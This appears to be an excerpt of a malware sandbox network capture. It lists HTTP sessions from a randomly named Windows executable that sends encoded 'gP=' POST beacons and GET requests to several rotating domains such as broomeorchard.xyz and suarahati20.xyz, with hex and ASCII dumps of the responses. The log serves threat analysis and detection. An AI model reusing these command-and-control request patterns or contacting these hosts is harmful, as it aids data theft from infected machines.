                                                                                                      Data Ascii: gP=hbrIhRUnKXpFHdcPK0IbX+COuW77gw0a3yinnLbJrbkpB8ahnwSZOwL2rz0pBJ/0O3+WbjH14zNmbrm/nPXIIKaKeqxYHfg1grL3JwWGwUw6hsZsIhc/8abzYLG5t3ijQdNd1jj+ypjrF4SAsFhSkeM5uocHmm6o5/IksiHVts4K9rHWMebWYAw8pNhxYmF/pic2/ajMJEqUb3lK40cRappg1Pys1Bf34Eb7ufx9PTU9D9T6WrcatBqqJ5nBOTWcOUax9M7ZpiLA9iy8oB4UsvgCtbMVboFJH2Jj4Zp/EsFykIvd5w/w3eZ/N0VgGhQz86h+SKFw85IzPemYnS9j1bgLNqr4o4Gni3QeOxHZQQPWIEHcb8z/vk0Yi7JdbdqKqpK2LSjqKFbHDHCuYHefg6oRAVx4ZYwk5AHq1IQGqVWiUC5cp8m/niwk66Ty9ccnww/enaIXlthMPe9LZDvm3fBE/GFrzzaTvXhkrJ1o/PyKIG8QQ3X1cuSx9kDgLZjXKynVaNmCTA+plWe9zTmJ8npVDId+QEpHqIFG9aIIOCq5pYEDw4IqED35ajO5E2Exlq1oUh1DHRmgtmOwMj9h92JKd1OM1wxKCVwz20MnRVlrEynMuDWBFYggz1boMTFJ+rUBxbH6RA8T1tG09b0qm7CY6W6vorALDrFmtsxNRdKZLvao+keX45pa6Pa+feQybYWWA24lVn9OfsfG8dj3JpOTEeCfOzFPAjFZ1u664w9fcVQRBBfS8gk9My2VQkHMeBhd68qo480j5u15StpsX1OSkvQ/rSZM9XUjkrweFk49DbqJBW8yAKO6gTp2Lg1cw3JCNrIIDeGbYfUuaLPpxwn6Qok2s/Oc89EOzAyR+Zs+avtqnArSPdSt5WyQUNImFlvrQabFrSpZNpmL4AwT/j2YCQy2ZjqRSG/lCUKdKbV1ue49xCqwkceUZxpTTUN140BEoRNV9eXPU02/mSYzwPRBMNXEcEDGKmu4VFi3qpCQZz2+t [TRUNCATED]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      32192.168.2.11500133.33.130.190803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:57:04.336757898 CEST469OUTGET /2ho9/?gP=sZDoihg8ajsFNu4sFB4wVMG24nWUkQUSxybOs53co7FoCsqulhCNIl7qmx9+CpDfKiL3BRrx3kpFS5y+tLS3H5WrA65sHfIkn+XzJEmDgF1B4fp1cD4x67M=&-L=kBMxZFRpAD6P HTTP/1.1
                                                                                                      Host: www.consultarfacil.online
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Oct 8, 2024 15:57:04.970952034 CEST394INHTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Tue, 08 Oct 2024 13:57:04 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 254
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 67 50 3d 73 5a 44 6f 69 68 67 38 61 6a 73 46 4e 75 34 73 46 42 34 77 56 4d 47 32 34 6e 57 55 6b 51 55 53 78 79 62 4f 73 35 33 63 6f 37 46 6f 43 73 71 75 6c 68 43 4e 49 6c 37 71 6d 78 39 2b 43 70 44 66 4b 69 4c 33 42 52 72 78 33 6b 70 46 53 35 79 2b 74 4c 53 33 48 35 57 72 41 36 35 73 48 66 49 6b 6e 2b 58 7a 4a 45 6d 44 67 46 31 42 34 66 70 31 63 44 34 78 36 37 4d 3d 26 2d 4c 3d 6b 42 4d 78 5a 46 52 70 41 44 36 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?gP=sZDoihg8ajsFNu4sFB4wVMG24nWUkQUSxybOs53co7FoCsqulhCNIl7qmx9+CpDfKiL3BRrx3kpFS5y+tLS3H5WrA65sHfIkn+XzJEmDgF1B4fp1cD4x67M=&-L=kBMxZFRpAD6P"}</script></head></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      33192.168.2.115001415.197.204.56803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:57:10.045954943 CEST739OUTPOST /8o1o/ HTTP/1.1
                                                                                                      Host: www.broomeorchard.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 199
                                                                                                      Origin: http://www.broomeorchard.xyz
                                                                                                      Referer: http://www.broomeorchard.xyz/8o1o/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 64 73 50 42 57 52 7a 48 47 58 68 74 44 69 53 50 67 43 76 43 70 6b 35 50 41 55 57 6c 5a 58 4e 54 38 78 43 61 4b 78 33 76 37 6c 44 45 77 52 65 41 68 78 36 2b 41 59 4b 6b 37 58 76 7a 74 42 32 68 46 49 75 55 66 34 49 6f 36 50 6d 61 44 70 5a 49 6c 49 71 34 55 49 30 51 2f 46 30 34 71 4f 31 59 32 4f 4c 69 71 72 63 56 61 79 44 33 4d 6b 62 33 68 4b 45 36 4d 47 51 68 54 45 54 70 6f 4c 55 6f 39 65 39 49 6f 4a 49 46 71 53 45 6b 66 56 4c 48 39 50 4f 76 72 71 6b 49 4e 4e 38 4f 73 44 4b 46 78 58 61 6e 42 46 59 68 48 35 33 5a 57 33 4a 4b 35 70 66 49 64 62 70 41 50 69 37 58 79 6f 48 43 4a 41 3d 3d
                                                                                                      Data Ascii: gP=dsPBWRzHGXhtDiSPgCvCpk5PAUWlZXNT8xCaKx3v7lDEwReAhx6+AYKk7XvztB2hFIuUf4Io6PmaDpZIlIq4UI0Q/F04qO1Y2OLiqrcVayD3Mkb3hKE6MGQhTETpoLUo9e9IoJIFqSEkfVLH9POvrqkINN8OsDKFxXanBFYhH53ZW3JK5pfIdbpAPi7XyoHCJA==


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      34192.168.2.115001515.197.204.56803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:57:12.592758894 CEST759OUTPOST /8o1o/ HTTP/1.1
                                                                                                      Host: www.broomeorchard.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 219
                                                                                                      Origin: http://www.broomeorchard.xyz
                                                                                                      Referer: http://www.broomeorchard.xyz/8o1o/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 64 73 50 42 57 52 7a 48 47 58 68 74 42 42 61 50 69 68 48 43 68 6b 35 49 64 6b 57 6c 53 33 4e 50 38 78 2b 61 4b 77 43 79 37 57 33 45 78 30 69 41 6d 30 4f 2b 44 59 4b 6b 7a 33 75 34 6a 68 32 2b 46 49 69 36 66 39 77 6f 36 50 79 61 44 6f 4a 49 6b 37 43 37 57 59 30 57 35 46 30 2b 75 4f 31 59 32 4f 4c 69 71 76 39 43 61 79 4c 33 4d 77 6e 33 68 76 6b 39 42 6d 51 2b 51 45 54 70 73 4c 55 73 39 65 39 36 6f 4e 4a 6f 71 58 41 6b 66 56 37 48 7a 2b 4f 73 79 61 6b 43 44 74 39 41 73 51 33 5a 77 48 61 6e 4a 45 38 31 45 59 32 2b 58 78 59 51 70 4b 57 66 65 49 68 43 62 45 61 6e 37 5a 69 4c 53 41 42 55 72 37 64 62 51 50 63 2b 6e 4e 48 78 69 53 5a 45 79 78 49 3d
                                                                                                      Data Ascii: gP=dsPBWRzHGXhtBBaPihHChk5IdkWlS3NP8x+aKwCy7W3Ex0iAm0O+DYKkz3u4jh2+FIi6f9wo6PyaDoJIk7C7WY0W5F0+uO1Y2OLiqv9CayL3Mwn3hvk9BmQ+QETpsLUs9e96oNJoqXAkfV7Hz+OsyakCDt9AsQ3ZwHanJE81EY2+XxYQpKWfeIhCbEan7ZiLSABUr7dbQPc+nNHxiSZEyxI=


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      35192.168.2.115001615.197.204.56803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:57:15.131545067 CEST1772OUTPOST /8o1o/ HTTP/1.1
                                                                                                      Host: www.broomeorchard.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 1231
                                                                                                      Origin: http://www.broomeorchard.xyz
                                                                                                      Referer: http://www.broomeorchard.xyz/8o1o/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 64 73 50 42 57 52 7a 48 47 58 68 74 42 42 61 50 69 68 48 43 68 6b 35 49 64 6b 57 6c 53 33 4e 50 38 78 2b 61 4b 77 43 79 37 57 76 45 77 47 61 41 6d 54 53 2b 43 59 4b 6b 35 58 75 37 6a 68 32 33 46 49 36 2b 66 39 30 65 36 4a 32 61 41 50 4a 49 78 36 43 37 63 59 30 57 30 6c 30 2f 71 4f 30 46 32 50 37 63 71 72 5a 43 61 79 4c 33 4d 78 33 33 31 71 45 39 44 6d 51 68 54 45 54 75 6f 4c 56 37 39 65 46 51 6f 4e 4d 56 71 44 30 6b 52 56 72 48 78 49 61 73 37 61 6b 45 45 74 38 64 73 51 37 77 77 48 48 63 4a 45 49 54 45 59 4f 2b 55 30 74 78 75 71 53 57 66 62 56 64 62 48 43 41 77 36 61 58 56 54 31 72 36 4c 78 75 47 2f 59 30 72 34 4f 4e 2b 6a 56 52 6b 6c 50 6d 62 63 48 6f 38 57 36 73 44 67 41 77 2f 6f 6e 35 63 39 4d 63 67 36 31 53 74 55 56 39 59 6f 39 46 68 63 74 43 6f 63 79 68 38 2b 78 36 48 38 30 54 42 50 35 31 49 6c 2b 61 4f 71 6d 68 7a 52 76 4b 77 52 43 35 6d 33 4e 54 50 6e 78 37 72 44 4d 32 73 75 79 59 54 6a 79 6b 4c 52 44 6b 50 75 34 31 4e 6b 4b 53 6b 35 4e 30 74 56 47 4a 63 52 30 72 68 61 61 59 63 31 4a [TRUNCATED]
                                                                                                      Data Ascii: gP=dsPBWRzHGXhtBBaPihHChk5IdkWlS3NP8x+aKwCy7WvEwGaAmTS+CYKk5Xu7jh23FI6+f90e6J2aAPJIx6C7cY0W0l0/qO0F2P7cqrZCayL3Mx331qE9DmQhTETuoLV79eFQoNMVqD0kRVrHxIas7akEEt8dsQ7wwHHcJEITEYO+U0txuqSWfbVdbHCAw6aXVT1r6LxuG/Y0r4ON+jVRklPmbcHo8W6sDgAw/on5c9Mcg61StUV9Yo9FhctCocyh8+x6H80TBP51Il+aOqmhzRvKwRC5m3NTPnx7rDM2suyYTjykLRDkPu41NkKSk5N0tVGJcR0rhaaYc1Jxykn34hRHY6o/aeGQ4V1gvVf45CgiIqcKvKMW9r55E1n1fLYVIzT2GrcvGVUNcB2bq3k2Gx8CvOrON2tZQkMIqGqdyCGA2Rv+euW/1SZdj9APcBn3CoZAbnwXk3Qm9YABAejEdJVBsjy0QSiawkWn8DONYLMBKqxoF2CqYzGL5ombXH+H+nkAgJGyUjhSasyc6M0gDzxTnCj7knccpL0GA+JwgLBx6ZKVWncbeMCoTn2stbSCcRF3OkpMx/KF+6g/XrZ3W+IkZakUBfjfprLh22WQnl7+QlMnqUREDYZoDTr8t02uYVJOXJWnXopa3zY/HX9LdmSC4vyW6uQsMXt+TC5ZuRW/sQ4VNtJwjsbcnn1EX4MAlzk77i1v/DTF/zAtJquuhwXKPwulLvelDUTen7lm8u/qPmR0qHB+IQ8t1o2pMM7fe1k9ppUtn//f0ShxVqKIVOnNvAAQschThf5oA7vELYrTsv7YcDHCEvMeMBCreRKPgp90FhLkpTyHz5gIU9EHlCtHm+Q0EQ//J0LDTpNeP18I8wCFFQUBxQAZgzBGsvu7p0PA3b39N+Qk/MXinIZSogYA/xBq8FDivbeAhBZMDbu9J8xfK6BwTrl90ZnAvTTHuc028ExhJoBO9EW6aZa+ThT5vZ5zT9S0Q1GLKITd+/fq4udmg [TRUNCATED]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      36192.168.2.115001715.197.204.56803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:57:17.676268101 CEST465OUTGET /8o1o/?-L=kBMxZFRpAD6P&gP=QunhVm6kZFQCJjGkuC7lsmN7UDLhVH5unS34CwGNyhG42F+U2Qq2Bbej6HS9mh+MEeKFfLAj85iyVJ5CsJDjT9kB1XQFiuYG2+iOt7QfZQyJLxqfhY4aAGU= HTTP/1.1
                                                                                                      Host: www.broomeorchard.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Oct 8, 2024 15:57:18.136419058 CEST394INHTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Tue, 08 Oct 2024 13:57:18 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 254
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 2d 4c 3d 6b 42 4d 78 5a 46 52 70 41 44 36 50 26 67 50 3d 51 75 6e 68 56 6d 36 6b 5a 46 51 43 4a 6a 47 6b 75 43 37 6c 73 6d 4e 37 55 44 4c 68 56 48 35 75 6e 53 33 34 43 77 47 4e 79 68 47 34 32 46 2b 55 32 51 71 32 42 62 65 6a 36 48 53 39 6d 68 2b 4d 45 65 4b 46 66 4c 41 6a 38 35 69 79 56 4a 35 43 73 4a 44 6a 54 39 6b 42 31 58 51 46 69 75 59 47 32 2b 69 4f 74 37 51 66 5a 51 79 4a 4c 78 71 66 68 59 34 61 41 47 55 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?-L=kBMxZFRpAD6P&gP=QunhVm6kZFQCJjGkuC7lsmN7UDLhVH5unS34CwGNyhG42F+U2Qq2Bbej6HS9mh+MEeKFfLAj85iyVJ5CsJDjT9kB1XQFiuYG2+iOt7QfZQyJLxqfhY4aAGU="}</script></head></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      37192.168.2.1150018198.252.106.191803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:57:23.207777023 CEST733OUTPOST /4est/ HTTP/1.1
                                                                                                      Host: www.suarahati20.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 199
                                                                                                      Origin: http://www.suarahati20.xyz
                                                                                                      Referer: http://www.suarahati20.xyz/4est/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 33 52 4b 49 4e 38 72 75 4b 58 69 59 52 65 44 38 59 31 44 58 33 63 41 4e 48 6a 51 77 76 44 73 58 58 77 4f 48 4b 68 50 64 42 36 54 61 51 6b 4b 64 70 67 61 63 32 65 72 7a 44 47 43 53 4a 59 54 4a 59 4e 4e 31 6c 4b 31 63 45 6c 46 53 44 32 78 6f 54 4f 4a 54 6c 71 73 33 45 31 33 39 75 35 64 70 35 65 6c 6f 59 41 58 6b 76 33 6e 63 34 6f 75 4b 45 74 52 36 56 2b 4b 61 72 36 32 31 2f 46 4e 6b 4d 45 79 30 58 69 54 71 79 4e 6a 64 47 31 6a 64 70 65 4b 39 72 6f 6c 73 47 4b 32 62 67 37 65 59 6a 74 79 75 64 4d 4b 5a 34 53 36 42 38 55 74 4b 58 69 4f 65 32 6f 30 63 53 55 51 4f 37 50 52 54 7a 77 3d 3d
                                                                                                      Data Ascii: gP=3RKIN8ruKXiYReD8Y1DX3cANHjQwvDsXXwOHKhPdB6TaQkKdpgac2erzDGCSJYTJYNN1lK1cElFSD2xoTOJTlqs3E139u5dp5eloYAXkv3nc4ouKEtR6V+Kar621/FNkMEy0XiTqyNjdG1jdpeK9rolsGK2bg7eYjtyudMKZ4S6B8UtKXiOe2o0cSUQO7PRTzw==
                                                                                                      Oct 8, 2024 15:57:23.791959047 CEST1033INHTTP/1.1 404 Not Found
                                                                                                      Connection: close
                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                      pragma: no-cache
                                                                                                      content-type: text/html
                                                                                                      content-length: 796
                                                                                                      date: Tue, 08 Oct 2024 13:57:23 GMT
                                                                                                      server: LiteSpeed
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      38192.168.2.1150019198.252.106.191803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:57:25.764981031 CEST753OUTPOST /4est/ HTTP/1.1
                                                                                                      Host: www.suarahati20.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 219
                                                                                                      Origin: http://www.suarahati20.xyz
                                                                                                      Referer: http://www.suarahati20.xyz/4est/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 33 52 4b 49 4e 38 72 75 4b 58 69 59 51 2b 54 38 61 57 37 58 31 38 41 4d 62 7a 51 77 6d 6a 73 4c 58 77 43 48 4b 67 62 4e 42 49 6e 61 51 46 36 64 6f 68 61 63 7a 65 72 7a 62 57 43 58 52 34 54 65 59 4e 78 39 6c 4c 6c 63 45 6c 52 53 44 33 74 6f 54 39 68 51 6c 36 73 31 4d 56 33 37 78 4a 64 70 35 65 6c 6f 59 41 44 4f 76 33 76 63 34 59 65 4b 46 4d 52 39 4a 4f 4b 5a 37 71 32 31 37 46 4e 67 4d 45 79 61 58 6d 4c 51 79 4f 62 64 47 77 50 64 6f 50 4c 72 68 6f 6c 71 4a 71 33 36 72 4f 7a 4a 6e 66 2f 35 54 71 53 7a 7a 69 32 6d 30 79 38 51 48 42 48 4a 31 37 38 65 47 79 78 2b 79 2b 30 61 6f 35 6b 66 7a 5a 62 51 33 52 6b 35 64 66 61 46 51 7a 55 6a 48 77 6b 3d
                                                                                                      Data Ascii: gP=3RKIN8ruKXiYQ+T8aW7X18AMbzQwmjsLXwCHKgbNBInaQF6dohaczerzbWCXR4TeYNx9lLlcElRSD3toT9hQl6s1MV37xJdp5eloYADOv3vc4YeKFMR9JOKZ7q217FNgMEyaXmLQyObdGwPdoPLrholqJq36rOzJnf/5TqSzzi2m0y8QHBHJ178eGyx+y+0ao5kfzZbQ3Rk5dfaFQzUjHwk=
                                                                                                      Oct 8, 2024 15:57:26.354571104 CEST1033INHTTP/1.1 404 Not Found
                                                                                                      Connection: close
                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                      pragma: no-cache
                                                                                                      content-type: text/html
                                                                                                      content-length: 796
                                                                                                      date: Tue, 08 Oct 2024 13:57:26 GMT
                                                                                                      server: LiteSpeed
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      39192.168.2.1150020198.252.106.191803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:57:28.322824001 CEST1766OUTPOST /4est/ HTTP/1.1
                                                                                                      Host: www.suarahati20.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 1231
                                                                                                      Origin: http://www.suarahati20.xyz
                                                                                                      Referer: http://www.suarahati20.xyz/4est/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
